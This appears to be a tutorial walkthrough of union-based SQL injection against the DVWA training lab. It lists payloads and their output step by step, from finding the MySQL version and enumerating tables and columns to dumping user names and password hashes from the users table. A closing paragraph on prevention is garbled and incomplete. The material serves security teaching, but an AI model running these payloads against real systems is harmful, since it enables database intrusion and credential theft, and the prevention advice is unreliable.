SQL Injection (DVWA)

SQL injection or SQLi is a code injection technique that exploits a security vulnerability in some computer software. An injection occurs at the database level of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed

we try insert string=>1

result : 

ID: 1
First name: admin
Surname: admin

string=>2

result :

ID: 2
First name: Gordon
Surname: Brown

string=>2 ' and 1=1#

result :

ID: 2 ' and 1=1#
First name: Gordon
Surname: Brown

Now we can see the version of mysql

string=>2 ' and 1=0 union select null, version()#

result :

ID: 2 ' and 1=0 union select null, version()#
First name: 
Surname: 5.1.41-3ubuntu12.10

we don't use blind sql injection because the version is 5, we can 

use information_schema for map database

OK let's we try...!!!

string=> 2 ' and 1=0 union select null, table_name from 

information_schema.tables#

result :

ID: 2 ' and 1=0 union select null, table_name from information_schema.

tables#
First name: 
Surname: VIEWSID: 2 ' and 1=0 union select null, table_name from 

information_schema.tables#
First name: 
Surname: guestbookID: 2 ' and 1=0 union select null, table_name from 

information_schema.tables#
First name: 
Surname: usersID: 2 ' and 1=0 union select null, table_name from 

information_schema.tables#
First name: 
Surname: columns_privID: 2 ' and 1=0 union select null, table_name 

from information_schema.tables#
First name: 
Surname: dbID: 2 ' and 1=0 union select null, table_name from 

information_schema.tables#
First name: 
Surname: event

we will see the users table 

string=>2' and 1=0 union select null,concat(table_name,0x0a,column_name)

 from information_schema.columns where table_name='users'#

result :

ID: 1' and 1=0 union select null,concat(table_name,0x0a,column_name)

 from information_schema.columns where table_name='users' #
First name: 
Surname: users
user_id

ID: 1' and 1=0 union select null,concat(table_name,0x0a,column_name)

 from information_schema.columns where table_name='users' #
First name: 
Surname: users
first_name

ID: 1' and 1=0 union select null,concat(table_name,0x0a,column_name)

 from information_schema.columns where table_name='users' #
First name: 
Surname: users
last_name

ID: 1' and 1=0 union select null,concat(table_name,0x0a,column_name)

 from information_schema.columns where table_name='users' #
First name: 
Surname: users
user

ID: 1' and 1=0 union select null,concat(table_name,0x0a,column_name) 

from information_schema.columns where table_name='users' #
First name: 
Surname: users
password

ID: 1' and 1=0 union select null,concat(table_name,0x0a,column_name)

 from information_schema.columns where table_name='users' #
First name: 
Surname: users
avatar

Now we will see the user_id, fisrt_name,last_name and password 

from users table

string=> 1' and 1=0 union select null,concat(user_id,0x0a,

first_name,0x0a,last_name,0x0a,password) from users#

result :

ID: 1' and 1=0 union select null,concat(user_id,0x0a,first_name,

0x0a,last_name,0x0a,password) from users#
First name: 
Surname: 1
admin
admin
186851308742b6c91337441f5772a818ID: 

1' and 1=0 union select null,concat(user_id,0x0a,first_name,0x0a,

last_name,0x0a,password) from users#
First name: 
Surname: 2
Gordon
Brown
e99a18c428cb38d5f260853678922e03ID: 

1' and 1=0 union select null,concat(user_id,0x0a,first_name,0x0a,

last_name,0x0a,password) from users#
First name: 
Surname: 3
Hack
Me
8d3533d75ae2c3966d7e0d4fcc69216bID: 

1' and 1=0 union select null,concat(user_id,0x0a,first_name,0x0a,

last_name,0x0a,password) from users#
First name: 
Surname: 4
Pablo
Picasso
0d107d09f5bbe40cade3de5c71e9e9b7ID: 

1' and 1=0 union select null,concat(user_id,0x0a,first_name,0x0a, 

last_name,0x0a,password) from users#
First name: 
Surname: 5
Bob
Smith
5f4dcc3b5aa765d61d8327deb882cf99 

To prevent our web php using sql injection tampered with our mysql can use several functions to which if the character can fiter cause the web we can injejksi. Most sql injection is done by inserting quotation marks ("'") for injection. So things must be done to prevent sql injecsi is a way to outsmart the quotes into a string.